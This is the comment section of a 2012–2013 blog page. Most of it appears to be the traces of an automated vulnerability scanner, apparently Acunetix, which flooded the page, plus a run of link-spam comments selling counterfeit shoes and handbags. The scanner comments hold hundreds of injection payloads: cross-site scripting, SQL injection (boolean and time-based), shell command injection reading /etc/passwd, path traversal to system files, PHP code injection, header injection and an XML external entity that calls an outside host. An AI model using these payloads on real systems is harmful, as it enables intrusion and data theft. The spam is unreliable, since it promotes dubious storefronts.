\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

  259. # 1 on 6 November 2012 at 18:35:

    WEB-INF/web.xml

  260. # 1 on 6 November 2012 at 18:35:

    WEB-INF\web.xml

  261. # P2gmF 1<ScRiPt >prompt(918124)</ScRiPt> on 6 November 2012 at 18:35:

    1

  262. # 1 on 6 November 2012 at 18:35:

    '"()&%1<ScRiPt >prompt(949646)</ScRiPt>

  263. # 1 on 6 November 2012 at 18:35:

    OTc3MTAy

  264. # 1 on 6 November 2012 at 18:35:

    undefined1<ScRiPt >prompt(907428)</ScRiPt>

  265. # 1 on 6 November 2012 at 18:35:

    1<ScRiPt
    >prompt(932468)</ScRiPt>

  266. # 1 on 6 November 2012 at 18:35:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910748></ScRiPt>

  267. # 1 on 6 November 2012 at 18:35:

    1<ScRiPt
    >prompt(928260)</ScRiPt>

  268. # 1 on 6 November 2012 at 18:35:

    <video><source onerror="javascript:prompt(990510)">

  269. # 1 on 6 November 2012 at 18:35:

    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910283)"></g></svg>

  270. # 1 on 6 November 2012 at 18:35:

    1[url=javascript:prompt(988908)]http://www.acunetix.com[/url]

  271. # 1 on 6 November 2012 at 18:35:

    1<div style=width:expression(prompt(944068))>

  272. # 1 on 6 November 2012 at 18:35:

    <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='924936'>

  273. # 1 on 6 November 2012 at 18:35:

    <body onload=prompt(951254)>

  274. # 1 on 6 November 2012 at 18:35:

    <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964897)>

  275. # 1 on 6 November 2012 at 18:35:

    <img src=xyz OnErRor=prompt(932842)>

  276. # 1 on 6 November 2012 at 18:36:

    <img/src=">" onerror=alert(930946)>

  277. # 1 on 6 November 2012 at 18:36:

    1%3CScRiPt%20%3Eprompt(933943)%3C/sCripT%3E

  278. # 1 on 6 November 2012 at 18:36:

    o<img acu onmouseover=prompt(983450) //o>

  279. # 1 on 6 November 2012 at 18:36:

    <input autofocus onfocus=prompt(911839)>

  280. # 1 on 6 November 2012 at 18:36:

    FiBz5
    1<ScRiPt >prompt(993896)</ScRiPt>

  281. # mulberry bag on 18 November 2012 at 20:56:

    Enjoyed looking at this, very good stuff, regards . "I will do my best. That is all I can do. I ask for your help-and God's." by Lyndon B. Johnson.
    <a href="http://www.mulberrybagukoutlet.co.uk" title="mulberry bag">mulberry bag</a>

  282. # Lose Stomach Fat Fast on 19 November 2012 at 22:54:

    Dead indited content, Really enjoyed examining.
    [url=http://exercisesto-losestomachfat.blogspot.com]Lose Stomach Fat Fast[/url]
    <a href="http://exercisesto-losestomachfat.blogspot.com" title="Lose Stomach Fat Fast">Lose Stomach Fat Fast</a>

  283. # mulberry handbags on 20 November 2012 at 4:48:

    It is in reality a nice and useful piece of information. I'm satisfied that you shared this useful information with us. Please keep us up to date like this. Thank you for sharing.
    [url=http://pinterest.com/daniel0128/mulberry-bags/]mulberry handbags[/url]
    <a href="http://pinterest.com/daniel0128/mulberry-bags/" title="mulberry handbags">mulberry handbags</a>

  284. # www.headphonesamazon.com on 21 November 2012 at 19:36:

    Some genuinely superb info , Glad I noticed this. "I have hardly ever known a mathematician who was capable of reasoning." by Plato.
    [url=http://www.headphonesamazon.com/]www.headphonesamazon.com[/url]
    <a href="http://www.headphonesamazon.com/" title="www.headphonesamazon.com">www.headphonesamazon.com</a>

  285. # camera online on 22 November 2012 at 12:45:

    Hey, you used to write magnificent, but the last few posts have been kinda boring?I miss your super writings. Past few posts are just a little bit out of track! come on!
    [url=http://www.cameraamazon.info/]camera online[/url]
    <a href="http://www.cameraamazon.info/" title="camera online">camera online</a>

  286. # cheap supra shoes on 22 November 2012 at 23:18:

    Perfectly composed content material , regards for information .
    [url=http://www.supratkstore.com]cheap supra shoes[/url]
    <a href="http://www.supratkstore.com" title="cheap supra shoes">cheap supra shoes</a>

  287. # Christian Louboutin shoes on 23 November 2012 at 8:32:

    Nice read, I just passed this onto a colleague who was doing some research on that. And he actually bought me lunch since I found it for him smile So let me rephrase that: Thanks for lunch! "The future is not something we enter. The future is something we create." by Leonard I. Sweet.
    [url=http://www.mychristianlouboutinonline.com/]Christian Louboutin shoes[/url]
    <a href="http://www.mychristianlouboutinonline.com/" title="Christian Louboutin shoes">Christian Louboutin shoes</a>

  288. # アグ ブーツ on 23 November 2012 at 10:03:

    I see something truly special in this website.
    [url=http://www.bootscheapsalejp.com/]アグ ブーツ[/url]
    <a href="http://www.bootscheapsalejp.com/" title="アグ ブーツ">アグ ブーツ</a>

  289. # Christian Louboutin boots on 23 November 2012 at 17:58:

    I have recently started a web site, the information you provide on this web site has helped me greatly. Thank you for all of your time & work. "The man who fights for his fellow-man is a better man than the one who fights for himself." by Clarence Darrow.
    [url=http://www.myclsale.com/christian-louboutin-boots-c-9.html/]Christian Louboutin boots[/url]
    <a href="http://www.myclsale.com/christian-louboutin-boots-c-9.html/" title="Christian Louboutin boots">Christian Louboutin boots</a>

  290. # chaquetas moncler mujer on 26 November 2012 at 14:24:

    Some genuinely quality content on this website , bookmarked .
    [url=http://www.monclercoatonline.com.es/chaquetas-moncler-mujeres-c-4.html]chaquetas moncler mujer[/url]
    <a href="http://www.monclercoatonline.com.es/chaquetas-moncler-mujeres-c-4.html" title="chaquetas moncler mujer">chaquetas moncler mujer</a>

  291. # Moncler Vests on 10 December 2012 at 10:26:

    I regard something really interesting about your website so I bookmarked .
    [url=http://supermonclercoats.webs.com/]Moncler Vests[/url]
    <a href="http://supermonclercoats.webs.com/" title="Moncler Vests">Moncler Vests</a>

  292. # Cheap Air Jordan 13 Retro on 10 December 2012 at 17:45:

    I like this web blog so much, saved to my bookmarks. "To hold a pen is to be at war." by Francois Marie Arouet Voltaire.
    [url=http://suparjordanshoes.webs.com/]Cheap Air Jordan 13 Retro[/url]
    <a href="http://suparjordanshoes.webs.com/" title="Cheap Air Jordan 13 Retro">Cheap Air Jordan 13 Retro</a>

  293. # 1 on 22 January 2013 at 12:07:

    1

  294. # 1 on 22 January 2013 at 16:32:

    1

  295. # 1 on 22 January 2013 at 16:52:

    1

  296. # 1 on 22 January 2013 at 23:31:

    1

  297. # response.write(9004726*9917221) on 22 January 2013 at 23:31:

    1

  298. # &cat /etc/passwd& on 22 January 2013 at 23:31:

    1

  299. # SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:31:

    1

  300. # '+response.write(9004726*9917221)+' on 22 January 2013 at 23:31:

    1

  301. # '&cat /etc/passwd&' on 22 January 2013 at 23:31:

    1

  302. # 1 on 22 January 2013 at 23:31:

    1

  303. # ../../../../../../../../../../etc/passwd on 22 January 2013 at 23:31:

    1

  304. # SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:31:

    1

  305. # "&cat /etc/passwd&" on 22 January 2013 at 23:31:

    1

  306. # -1 or 35=35 on 22 January 2013 at 23:31:

    1

  307. # "+response.write(9004726*9917221)+" on 22 January 2013 at 23:31:

    1

  308. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 22 January 2013 at 23:31:

    1

  309. # SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:31:

    1

  310. # 1 on 22 January 2013 at 23:31:

    1

  311. # cat /etc/passwd on 22 January 2013 at 23:31:

    1

  312. # -1 or 35=0 on 22 January 2013 at 23:31:

    1

  313. # ../../../../../../../../../../etc/passwd.jpg on 22 January 2013 at 23:31:

    1

  314. # `cat /etc/passwd` on 22 January 2013 at 23:31:

    1

  315. # -1' or '27'='27 on 22 January 2013 at 23:31:

    1

  316. # |cat /etc/passwd# on 22 January 2013 at 23:31:

    1

  317. # -1' or '27'='0 on 22 January 2013 at 23:31:

    1

  318. # Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 22 January 2013 at 23:31:

    1

  319. # '|'ld on 22 January 2013 at 23:31:

    1

  320. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 22 January 2013 at 23:31:

    1

  321. # 268435455 on 22 January 2013 at 23:31:

    1

  322. # -1" or "50"="50 on 22 January 2013 at 23:31:

    1

  323. # /../..//../..//../..//../..//../..//etc/passwd.jpg on 22 January 2013 at 23:31:

    1

  324. # on 22 January 2013 at 23:31:

    1

  325. # "|"ld on 22 January 2013 at 23:31:

    1

  326. # -1" or "50"="0 on 22 January 2013 at 23:31:

    1

  327. # ;cat /etc/passwd; on 22 January 2013 at 23:31:

    1

  328. # .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 22 January 2013 at 23:31:

    1

  329. # .. on 22 January 2013 at 23:31:

    1

  330. # 1 and sleep(4) on 22 January 2013 at 23:31:

    1

  331. # ';cat /etc/passwd;' on 22 January 2013 at 23:31:

    1

  332. # /etc/passwd on 22 January 2013 at 23:31:

    1

  333. # 1e309 on 22 January 2013 at 23:31:

    1

  334. # 1 on 22 January 2013 at 23:31:

    response.write(9090838*9200544)

  335. # ";cat /etc/passwd;" on 22 January 2013 at 23:31:

    1

  336. # 1 on 22 January 2013 at 23:31:


    SomeCustomInjectedHeader:injected_by_wvs

  337. # ${99729+99760} on 22 January 2013 at 23:31:

    1

  338. # ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 22 January 2013 at 23:31:

    1

  339. # '"\'\");|]*{ <> on 22 January 2013 at 23:31:

    1

  340. # 1 on 22 January 2013 at 23:31:

    '+response.write(9090838*9200544)+'

  341. # 1 or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:31:

    1

  342. # ||cat /etc/passwd on 22 January 2013 at 23:31:

    1

  343. # 1 on 22 January 2013 at 23:31:


    SomeCustomInjectedHeader:injected_by_wvs

  344. # 1' and sleep(4)=' on 22 January 2013 at 23:31:

    1

  345. # &dir on 22 January 2013 at 23:31:

    1

  346. # 1' and (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:31:

    1

  347. # Array on 22 January 2013 at 23:31:

    1

  348. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 22 January 2013 at 23:31:

    1

  349. # 1" and sleep(4)=" on 22 January 2013 at 23:31:

    1

  350. # '&dir&' on 22 January 2013 at 23:31:

    1

  351. # 1 on 22 January 2013 at 23:31:

    "+response.write(9090838*9200544)+"

  352. # 1 on 22 January 2013 at 23:31:

    1

  353. # 1 on 22 January 2013 at 23:31:


    SomeCustomInjectedHeader:injected_by_wvs

  354. # "&dir&" on 22 January 2013 at 23:31:

    1

  355. # 1' or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:31:

    1

  356. # .. on 22 January 2013 at 23:31:

    1

  357. # 1&n966074=v991783 on 22 January 2013 at 23:31:

    1

  358. # 1" or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:31:

    1

  359. # http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 22 January 2013 at 23:31:

    1

  360. # invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 22 January 2013 at 23:31:

    1

  361. # 1'=sleep(4)=' on 22 January 2013 at 23:31:

    1

  362. # 1some_inexistent_file_with_long_name%00.jpg on 22 January 2013 at 23:31:

    1

  363. # 1 on 22 January 2013 at 23:31:

    ${99199+99048}

  364. # |dir on 22 January 2013 at 23:31:

    1

  365. # file:///etc/passwd on 22 January 2013 at 23:31:

    1

  366. # 1"=sleep(4)=" on 22 January 2013 at 23:31:

    1

  367. # http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 22 January 2013 at 23:31:

    1

  368. # ) on 22 January 2013 at 23:31:

    1

  369. # /\../\../\../\../\../\../\../etc/passwd on 22 January 2013 at 23:31:

    1

  370. # '|dir on 22 January 2013 at 23:31:

    1

  371. # 1;select pg_sleep(4); -- on 22 January 2013 at 23:31:

    1

  372. # !(()&&!|*|*| on 22 January 2013 at 23:31:

    1

  373. # "|dir on 22 January 2013 at 23:31:

    1

  374. # 1';select pg_sleep(4); -- on 22 January 2013 at 23:31:

    1

  375. # ../../../../../../../../../../windows/win.ini on 22 January 2013 at 23:31:

    1

  376. # 1; waitfor delay '0:0:4' -- on 22 January 2013 at 23:31:

    1

  377. # ^(#$!@#$)(()))****** on 22 January 2013 at 23:31:

    1

  378. # ../../../../../../../../../../boot.ini on 22 January 2013 at 23:31:

    1

  379. # 1'; waitfor delay '0:0:4' -- on 22 January 2013 at 23:31:

    1

  380. # ../../../../../../../../../../windows/win.ini.jpg on 22 January 2013 at 23:31:

    1

  381. # 1"; waitfor delay '0:0:4' -- on 22 January 2013 at 23:31:

    1

  382. # 1 on 22 January 2013 at 23:31:

    1&n943001=v910815

  383. # on 22 January 2013 at 23:31:

    1

  384. # ................windowswin.ini on 22 January 2013 at 23:31:

    1

  385. # Array on 22 January 2013 at 23:31:

    1

  386. # ..\..\..\..\..\..\..\..\windows\win.ini on 22 January 2013 at 23:31:

    1

  387. # 1 on 22 January 2013 at 23:31:

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

  388. # '"() on 22 January 2013 at 23:31:

    1

  389. # 1 on 22 January 2013 at 23:31:

    1some_inexistent_file_with_long_name%00.jpg

  390. # 1 on 22 January 2013 at 23:31:

    http://testasp.vulnweb.com/t/fit.txt?%00.jpg

  391. # /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 22 January 2013 at 23:31:

    1

  392. # ;print(md5(acunetix_wvs_security_test)); on 22 January 2013 at 23:31:

    1

  393. # ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 22 January 2013 at 23:31:

    1

  394. # ';print(md5(acunetix_wvs_security_test));$a=' on 22 January 2013 at 23:31:

    1

  395. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 22 January 2013 at 23:31:

    1

  396. # ";print(md5(acunetix_wvs_security_test));$a=" on 22 January 2013 at 23:31:

    1

  397. # unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 22 January 2013 at 23:31:

    1

  398. # 1 on 22 January 2013 at 23:31:

    Array

  399. # ${@print(md5(acunetix_wvs_security_test))} on 22 January 2013 at 23:31:

    1

  400. # 1 on 22 January 2013 at 23:31:

    '"()

  401. # ${@print(md5(acunetix_wvs_security_test))}\ on 22 January 2013 at 23:31:

    1

  402. # 1 on 22 January 2013 at 23:31:

    )

  403. # http://testasp.vulnweb.com/t/xss.html?%00.jpg on 22 January 2013 at 23:31:

    1

  404. # 1 on 22 January 2013 at 23:31:

    !(()&&!|*|*|

  405. # 1 on 22 January 2013 at 23:31:

    ^(#$!@#$)(()))******

  406. # 1 on 22 January 2013 at 23:31:

    1

  407. # 1 on 22 January 2013 at 23:31:

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  408. # acunetix_wvs_invalid_filename on 22 January 2013 at 23:31:

    1

  409. # 1 on 22 January 2013 at 23:31:

    1

  410. # 1'" on 22 January 2013 at 23:31:

    1

  411. # 1 on 22 January 2013 at 23:31:

    1

  412. # 6030 on 22 January 2013 at 23:31:

    1

  413. # \ on 22 January 2013 at 23:31:

    1

  414. # 1 on 22 January 2013 at 23:31:

    268435455

  415. # 1Axa7Ac on 22 January 2013 at 23:31:

    1

  416. # 6030 on 22 January 2013 at 23:31:

    1

  417. # 1 on 22 January 2013 at 23:31:

  418. # @@zPbjT on 22 January 2013 at 23:31:

    1

  419. # 1 on 22 January 2013 at 23:31:

    ;print(md5(acunetix_wvs_security_test));

  420. # 1 on 22 January 2013 at 23:31:

    ..

  421. # 6030/. on 22 January 2013 at 23:31:

    1

  422. # 1 on 22 January 2013 at 23:31:

    1e309

  423. # 1 on 22 January 2013 at 23:31:

    ';print(md5(acunetix_wvs_security_test));$a='

  424. # JyI= on 22 January 2013 at 23:31:

    1

  425. # 1 on 22 January 2013 at 23:31:

    ";print(md5(acunetix_wvs_security_test));$a="

  426. # ?'?" on 22 January 2013 at 23:31:

    1

  427. # 1 on 22 January 2013 at 23:31:

    ${@print(md5(acunetix_wvs_security_test))}

  428. # ?''?"" on 22 January 2013 at 23:31:

    1

  429. # 1 on 22 January 2013 at 23:31:

    ${@print(md5(acunetix_wvs_security_test))}\

  430. # ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 22 January 2013 at 23:31:

    1

  431. # 1 on 22 January 2013 at 23:31:

    '"\'\");|]*{
    <>

  432. # 1 on 22 January 2013 at 23:31:

    Array

  433. # 1 on 22 January 2013 at 23:31:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  434. # <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif"> ]> <xxx>&acunetixe on 22 January 2013 at 23:31:

    1

  435. # //www.acunetix.tst on 22 January 2013 at 23:31:

    1

  436. # 1 on 22 January 2013 at 23:31:

    //www.acunetix.tst

  437. # '" on 22 January 2013 at 23:31:

    1

  438. # 1 on 22 January 2013 at 23:32:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE acunetix [
    <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif">
    ]>
    <xxx>&acunetixent;</xxx>

  439. # <!-- on 22 January 2013 at 23:32:

    1

  440. # '"()&%1<ScRiPt >prompt(908926)</ScRiPt> on 22 January 2013 at 23:32:

    1

  441. # 1 on 22 January 2013 at 23:32:

    1

  442. # 1 on 22 January 2013 at 23:32:

    acunetix_wvs_invalid_filename

  443. # 1 on 22 January 2013 at 23:32:

    6030

  444. # 1 on 22 January 2013 at 23:32:

    1

  445. # 1 on 22 January 2013 at 23:32:

    6030

  446. # OTU0NTM4 on 22 January 2013 at 23:32:

    1

  447. # 1 on 22 January 2013 at 23:32:

    6030/.

  448. # 1 on 22 January 2013 at 23:32:

    &cat /etc/passwd&

  449. # 1 on 22 January 2013 at 23:32:

    1

  450. # 1 on 22 January 2013 at 23:32:

    '"

  451. # 1 on 22 January 2013 at 23:32:

    -1 or 77=77

  452. # undefined1<ScRiPt >prompt(909411)</ScRiPt> on 22 January 2013 at 23:32:

    1

  453. # 1 on 22 January 2013 at 23:32:

    <!--

  454. # 1 on 22 January 2013 at 23:32:

    '&cat /etc/passwd&'

  455. # 1 on 22 January 2013 at 23:32:

    -1 or 77=0

  456. # 1 on 22 January 2013 at 23:32:

    "&cat /etc/passwd&"

  457. # 1 on 22 January 2013 at 23:32:

    -1' or '53'='53

  458. # 1 on 22 January 2013 at 23:32:

    -1' or '53'='0

  459. # 1 on 22 January 2013 at 23:32:


    cat /etc/passwd

  460. # 1 on 22 January 2013 at 23:32:

    `cat /etc/passwd`

  461. # 1 on 22 January 2013 at 23:32:

    |cat /etc/passwd#

  462. # 1 on 22 January 2013 at 23:32:

    -1" or "19"="19

  463. # 1 on 22 January 2013 at 23:32:

    '|'ld

  464. # 1<ScRiPt >prompt(943314)</ScRiPt> on 22 January 2013 at 23:32:

    1

  465. # 1 on 22 January 2013 at 23:32:

    -1" or "19"="0

  466. # 1 on 22 January 2013 at 23:32:

    "|"ld

  467. # 1 on 22 January 2013 at 23:32:

    1 and sleep(5.866)

  468. # 1 on 22 January 2013 at 23:32:

    1 or (sleep(5.866)+1) limit 1 --

  469. # 1 on 22 January 2013 at 23:32:

    ;cat /etc/passwd;

  470. # 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942415></ScRiPt> on 22 January 2013 at 23:32:

    1

  471. # 1 on 22 January 2013 at 23:32:

    1

  472. # 1 on 22 January 2013 at 23:32:

    1'"

  473. # 1 on 22 January 2013 at 23:32:

    1' and sleep(5.866)='

  474. # 1 on 22 January 2013 at 23:32:

    ';cat /etc/passwd;'

  475. # 1 on 22 January 2013 at 23:32:

    \

  476. # 1 on 22 January 2013 at 23:32:

    1' and (sleep(5.866)+1) limit 1 --

  477. # 1 on 22 January 2013 at 23:32:

    ";cat /etc/passwd;"

  478. # 1 on 22 January 2013 at 23:32:

    1" and sleep(5.866)="

  479. # 1 on 22 January 2013 at 23:32:

    ||cat /etc/passwd

  480. # 1 on 22 January 2013 at 23:32:

    1Axa7Ac

  481. # 1<ScRiPt >prompt(930720)</ScRiPt> on 22 January 2013 at 23:32:

    1

  482. # 1 on 22 January 2013 at 23:32:

    1' or (sleep(5.866)+1) limit 1 --

  483. # 1 on 22 January 2013 at 23:32:

    @@5h3si

  484. # 1 on 22 January 2013 at 23:32:

    JyI=

  485. # 1 on 22 January 2013 at 23:32:

    1" or (sleep(5.866)+1) limit 1 --

  486. # 1 on 22 January 2013 at 23:32:

    1'=sleep(5.866)='

  487. # 1 on 22 January 2013 at 23:32:

    ?'?"

  488. # 1 on 22 January 2013 at 23:32:

    &dir

  489. # 1 on 22 January 2013 at 23:32:

    1"=sleep(5.866)="

  490. # 1 on 22 January 2013 at 23:32:

    ?''?""

  491. # 1 on 22 January 2013 at 23:32:

    '&dir&'

  492. # 1 on 22 January 2013 at 23:32:

    1;select pg_sleep(5.866); --

  493. # <video><source onerror="javascript:prompt(976305)"> on 22 January 2013 at 23:32:

    1

  494. # 1 on 22 January 2013 at 23:32:

    "&dir&"

  495. # 1 on 22 January 2013 at 23:32:

    1';select pg_sleep(5.866); --

  496. # 1 on 22 January 2013 at 23:32:

    |dir

  497. # 1 on 22 January 2013 at 23:32:

    1; waitfor delay '0:0:5.866' --

  498. # 1 on 22 January 2013 at 23:32:

    '|dir

  499. # 1 on 22 January 2013 at 23:32:

    1'; waitfor delay '0:0:5.866' --

  500. # <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918970)"></g></svg> on 22 January 2013 at 23:32:

    1

  501. # 1 on 22 January 2013 at 23:32:

    "|dir

  502. # 1 on 22 January 2013 at 23:32:

    1"; waitfor delay '0:0:5.866' --

  503. # 1[url=javascript:prompt(905464)]http://www.acunetix.com[/url] on 22 January 2013 at 23:32:

    1

  504. # 1 on 22 January 2013 at 23:32:

    ../../../../../../../../../../etc/passwd

  505. # 1 on 22 January 2013 at 23:32:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  506. # 1<div style=width:expression(prompt(969724))> on 22 January 2013 at 23:32:

    1

  507. # 1 on 22 January 2013 at 23:32:

    ../../../../../../../../../../etc/passwd.jpg

  508. # 1 on 22 January 2013 at 23:32:

    Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

  509. # <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='939519'> on 22 January 2013 at 23:32:

    1

  510. # 1 on 22 January 2013 at 23:32:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  511. # 1 on 22 January 2013 at 23:32:

    /../..//../..//../..//../..//../..//etc/passwd.jpg

  512. # 1 on 22 January 2013 at 23:32:

    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

  513. # 1 on 22 January 2013 at 23:32:

    /etc/passwd

  514. # <body onload=prompt(929775)> on 22 January 2013 at 23:32:

    1

  515. # 1 on 22 January 2013 at 23:32:

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

  516. # 1 on 22 January 2013 at 23:32:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

  517. # 1 on 22 January 2013 at 23:32:

    ..

  518. # <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947352)> on 22 January 2013 at 23:32:

    1

  519. # 1 on 22 January 2013 at 23:32:

    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

  520. # 1 on 22 January 2013 at 23:32:

    file:///etc/passwd

  521. # 1 on 22 January 2013 at 23:32:

    /\../\../\../\../\../\../\../etc/passwd

  522. # <img src=xyz OnErRor=prompt(998178)> on 22 January 2013 at 23:32:

    1

  523. # 1 on 22 January 2013 at 23:32:

    ../../../../../../../../../../windows/win.ini

  524. # 1 on 22 January 2013 at 23:32:

    ../../../../../../../../../../boot.ini

  525. # 1 on 22 January 2013 at 23:32:

    ../../../../../../../../../../windows/win.ini.jpg

  526. # 1 on 22 January 2013 at 23:32:

  527. # 1%3CScRiPt%20%3Eprompt(925831)%3C/sCripT%3E on 22 January 2013 at 23:32:

    1

  528. # 1 on 22 January 2013 at 23:32:

    ................windowswin.ini

  529. # 1 on 22 January 2013 at 23:32:

    ..\..\..\..\..\..\..\..\windows\win.ini

  530. # 1 on 22 January 2013 at 23:32:

    /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

  531. # 1 on 22 January 2013 at 23:33:

    ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

  532. # on 22 January 2013 at 23:33:

    1

  533. # 1 on 22 January 2013 at 23:33:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

  534. # 1 on 22 January 2013 at 23:33:

